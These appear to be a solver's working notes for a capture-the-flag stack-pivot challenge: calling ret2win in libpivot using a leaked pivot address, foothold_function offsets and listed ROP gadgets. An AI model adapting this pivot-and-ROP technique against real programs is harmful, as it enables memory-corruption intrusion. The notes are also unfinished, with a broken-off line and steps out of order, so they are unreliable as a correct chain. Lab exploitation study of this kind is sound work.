Goal is to call ret2win from libpivot
we don't know where ret2win is, but we do know where foothold_function is

pivot is at 0x7f2041e78f10
0x0000000000400720 : foothold_function@plt
0x000000000000096a : foothold_function

resolve ret2win:
1:  resolve foothold_function
    resolved foothold: [0x400720 + 0x20091a]
    offset of foothold vs 

2: ret2win = [0x400720 + 0x20091a] + 279 

64 rop chains possible at 0x7eff3d368f10
6 rop chains possible at buffer overflow

0x00000000004007c8 : pop rbp ; ret
0x00000000004007c1 : jmp rax

00000000004009bb <usefulGadgets>:
  4009bb:	58                   	pop    rax
  4009bc:	c3                   	ret    

  4009bd:	48 94                	xchg   rsp,rax
  4009bf:	c3                   	ret    

  4009c0:	48 8b 00             	mov    rax,QWORD PTR [rax]
  4009c3:	c3                   	ret    

  4009c4:	48 01 e8             	add    rax,rbp
  4009c7:	c3                   	ret    

1: resolve foothold (2)
4: pop rax (rax is 0x400720 + 0x20091a)
5: pop rbp (rbp is 279)
6: add rax, rbp
7: mov rax, [rax]
8: jmp rax


2: pop rax          (4)
3: xchg rsp,rax     (5)